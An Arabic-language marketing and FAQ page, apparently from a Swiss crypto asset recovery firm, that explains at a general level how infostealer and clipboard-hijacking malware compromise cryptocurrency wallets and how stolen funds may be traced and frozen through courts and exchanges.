أوامر التجميد القضائية: في القضايا التي تنطوي على خسائر مالية جسيمة، يمكن للمستشارين القانونيين المتخصصين في استرداد الأصول الرقمية استصدار أوامر إفصاح وتجميد قضائية مستعجلة من المحاكم (مثل أوامر Norwich Pharmacal أو Bankers Trust في ولايات القانون العام) لإلزام منصات التداول بتجميد الأصول المسروقة والكشف عن سجلات تحديد هوية العميل (KYC).
هل تشتبه في اختراق محفظة العملات المشفرة الخاصة بك بواسطة برمجيات خبيثة؟
ريكوفريس (Recoveris) هي شركة استخبارات البلوكتشين واسترداد الأصول الرقمية ومقرها في تسوغ، سويسرا. إذا تم الاستيلاء على مفاتيحك الخاصة أو عبارات الاسترداد أو خزائن امتدادات المتصفح بواسطة برمجيات خبيثة، يمكن لفريقنا الجنائي تقييم حادثتك، تتبع تدفقات الأموال وتنسيق تجميد الأصول المسروقة مع منصات التداول.
تصرف بسرعة: نافذة التجميد الطارئ في منصات التداول حاسمة قبل تسييل الأموال المسروقة.
تواصل مع Recoveris لتقييم الحادثةاختبر مدى جاهزيتك لاسترداد الأصول
ما مدى استعدادك للتعامل مع اختراق برمجي خبيث لجهازك أو محفظة مخترقة؟ أكمل تقييمنا التشخيصي المنظم لتقييم قدرتك على الاستجابة وفرص استرداد الأصول.
بدء تقييم الاسترداد3-5 دقائق • 10 أسئلة • ملخص شخصي فوري
المراجع والمصادر
- 1.Chainalysis. (2026). The 2026 Crypto Crime Report & Stolen Funds Ecosystem. متاح عبر: https://www.chainalysis.com/reports/crypto-crime-2026/
- 2.TRM Labs. (2026). Cross-Chain Tracing and Multi-Hop Obfuscation in Cybercrime Investigations. متاح عبر: https://www.trmlabs.com/glossary/cross-chain-tracing
- 3.FBI Internet Crime Complaint Center (IC3). (2022). Cybercriminals Use Search Engine Advertisement Services to Impersonate Legitimate Brands and Deliver Malware. متاح عبر: https://www.ic3.gov/PSA/2022/PSA221221
- 4.Eurojust. (2024). Malware Targeting Millions of People Taken Down by International Coalition (Operation Magnus). متاح عبر: https://www.eurojust.europa.eu/news/malware-targeting-millions-people-taken-down-international-coalition
- 5.U.S. Department of Justice (DOJ). (2024). U.S. Joins International Action Against RedLine and META Infostealers. متاح عبر: https://www.justice.gov/usao-wdtx/pr/us-joins-international-action-against-redline-and-meta-infostealers
- 6.Academic Research (arXiv). (2021). EthClipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion. متاح عبر: https://arxiv.org/abs/2108.14004
- 7.FBI Internet Crime Complaint Center (IC3). (2025). Public Service Announcement on Spoofed Tech Portals and Fraudulent Support Entities. متاح عبر: https://www.ic3.gov/PSA/2025/PSA250919
- 8.SentinelOne. (2025). How ClickFix is Weaponizing Verification Fatigue to Deliver RATs and Infostealers. متاح عبر: https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
- 9.Qualys Threat Research. (2024). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. متاح عبر: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
- 10.Huntress Threat Library. (2025). Lumma Stealer Behavioral Profile, Persistence, and Data Exfiltration. متاح عبر: https://www.huntress.com/threat-library/malware/lumma-stealer
- 11.Darktrace Threat Insights. (2025). The Rise of the Lumma Info Stealer and Wallet Harvesting Campaigns. متاح عبر: https://www.darktrace.com/blog/the-rise-of-the-lumma-info-stealer
- 12.SlowMist Technology. (2026). Web3 Wallet Attack Vectors and Malicious Extension Exploits. متاح عبر: https://hacked.slowmist.io/?c=Wallet&page=1
الأسئلة الشائعة
هل يمكن لبرمجيات سرقة المعلومات سرقة الأموال من محفظة أجهزة مثل Ledger أو Trezor؟
لا تستطيع برمجيات سرقة المعلومات استخراج المفاتيح الخاصة المخزنة بشكل آمن داخل عنصر الأمان المعزول (Secure Element) في محفظة الأجهزة. ومع ذلك، يمكن لبرمجيات اختطاف الحافظة (Clipper) استبدال عناوين الوجهة بصمت أثناء المعاملات، كما قد تخدع مطالبات تحديث البرامج الثابتة أو البرمجيات الزائفة المستخدمين وتدفعهم لكتابة عبارات الاسترداد مباشرة عبر لوحة المفاتيح.
إذا حذف برنامج مكافحة الفيروسات حصان طروادة السارق، فهل محفظتي المشفرة آمنة للاستخدام؟
كلا. تُنهي برمجيات سرقة المعلومات عادةً عملية استخراج البيانات في غضون ثوانٍ من تشغيلها، حيث تنقل خزائن امتدادات المتصفح والمفاتيح المؤقتة إلى خوادم التحكم والسيطرة (C2) قبل أن تتمكن خوارزميات مكافحة الفيروسات التقليدية من الاستجابة. وبمجرد تشغيل برمجية سرقة على الجهاز، يجب اعتبار جميع المحافظ الساخنة (Hot Wallets) المستضافة عليه مخترقة بشكل دائم.
كيف يتجاوز قراصنة الحافظة التحقق البصري من العناوين؟
تولد برمجيات Clipper المتقدمة ملايين العناوين المخصصة (Vanity Addresses) للعملات المشفرة التي تطابق أول 4 إلى 6 أحرف وآخر 4 إلى 6 أحرف من تنسيقات الوجهات الشائعة. وعندما يكتفي المستخدمون بفحص بداية العنوان الملصق ونهايته فقط، فإنهم يؤكدون المعاملات دون قصد لصالح محافظ يتحكم فيها المهاجم.
هل يمكن استرداد العملات المشفرة بعد سرقتها بواسطة مشغلي برمجيات سرقة المعلومات؟
رغم أنه لا يمكن إلغاء تحويلات البلوكتشين اللامركزية أو التراجع عنها، إلا أنه يمكن تتبع الأموال جنائياً عبر مختلف القفزات والجسور المتعددة السلاسل (Cross-Chain Bridges). وعندما تصل الأصول المسروقة إلى منصات تداول مركزية أو نقاط تحويل خاضعة للتنظيم، يمكن للتجميد القانوني الطارئ والتنسيق مع وكالات إنفاذ القانون حجز الأرصدة بهدف استردادها.
هل يمكن لبرمجيات سرقة المعلومات إصابة أجهزة macOS أو Linux، أم أنها تستهدف فقط أجهزة Windows؟
على الرغم من أن نظام Windows يمثل الهدف الأساسي نظراً لحصته السوقية الواسعة على الأجهزة المكتبية واستخدامه لواجهة DPAPI في التخزين، إلا أن عصابات الجريمة السيبرانية تنشر بنشاط برمجيات سرقة متعددة المنصات مكتوبة بلغتي Go و Rust، فضلاً عن متغيرات مخصصة لنظام macOS مثل Atomic macOS Stealer (AMOS) التي تستولي على بيانات اعتماد Apple Keychain وخزائن امتدادات محافظ المتصفح.